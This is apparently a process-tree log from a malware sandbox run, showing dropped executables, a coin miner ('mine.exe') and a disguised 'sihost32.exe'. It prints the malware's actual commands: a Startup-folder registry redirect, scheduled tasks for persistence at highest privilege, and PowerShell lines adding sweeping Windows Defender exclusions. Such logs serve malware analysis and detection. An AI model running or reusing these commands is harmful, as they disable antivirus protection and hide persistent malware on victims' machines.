C:\Users\Admin\AppData\Local\Temp\NylghausHosen_2021-10-12_23-24 2.exe"C:\Users\Admin\AppData\Local\Temp\NylghausHosen_2021-10-12_23-24 2.exe"2⤵
- Executes dropped EXE
PID:4684
-
-
C:\Users\Admin\AppData\Local\Temp\Qf5dSHBPGf8J.exe"C:\Users\Admin\AppData\Local\Temp\Qf5dSHBPGf8J.exe"2⤵
- Executes dropped EXE
PID:4748
-
-
C:\Users\Admin\AppData\Local\Temp\897.exeC:\Users\Admin\AppData\Local\Temp\897.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1172
-
C:\Users\Admin\AppData\Local\Temp\2364.exeC:\Users\Admin\AppData\Local\Temp\2364.exe1⤵
- Executes dropped EXE
- Drops startup file
PID:1576
-
C:\Users\Admin\AppData\Local\Temp\314F.exeC:\Users\Admin\AppData\Local\Temp\314F.exe1⤵
- Executes dropped EXE
PID:712 -
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"2⤵
- Executes dropped EXE
PID:1652 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\3⤵PID:2192
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\4⤵PID:4188
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F3⤵
- Creates scheduled task(s)
PID:2228
-
-
-
C:\Users\Admin\AppData\Local\Temp\3A97.exeC:\Users\Admin\AppData\Local\Temp\3A97.exe1⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1768 -
C:\Users\Admin\AppData\Local\Temp\b6f3ec03-8791-47a5-b46e-bf85f644439c\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\b6f3ec03-8791-47a5-b46e-bf85f644439c\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\b6f3ec03-8791-47a5-b46e-bf85f644439c\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3800 -
C:\Users\Admin\AppData\Local\Temp\b6f3ec03-8791-47a5-b46e-bf85f644439c\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\b6f3ec03-8791-47a5-b46e-bf85f644439c\AdvancedRun.exe" /SpecialRun 4101d8 38003⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4172
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\3A97.exe" -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4404
-
-
C:\Users\Admin\AppData\Local\Temp\3A97.exe"C:\Users\Admin\AppData\Local\Temp\3A97.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4456 -
C:\Users\Admin\AppData\Local\Temp\mine.exe"C:\Users\Admin\AppData\Local\Temp\mine.exe"3⤵
- Executes dropped EXE
PID:4188 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\mine.exe"4⤵PID:1932
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit5⤵PID:2744
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"6⤵PID:4112
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"6⤵PID:980
-
-
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"5⤵PID:2036
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"6⤵
- Creates scheduled task(s)
PID:4624
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\services32.exe"5⤵PID:4900
-
C:\Users\Admin\services32.exeC:\Users\Admin\services32.exe6⤵
- Executes dropped EXE
PID:3236 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\services32.exe"7⤵PID:4988
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit8⤵PID:4488
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"9⤵PID:788
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"8⤵PID:4984
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\6666.exe"C:\Users\Admin\AppData\Local\Temp\6666.exe"3⤵
- Executes dropped EXE
PID:4108
-
-
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe1⤵
- Executes dropped EXE
PID:4488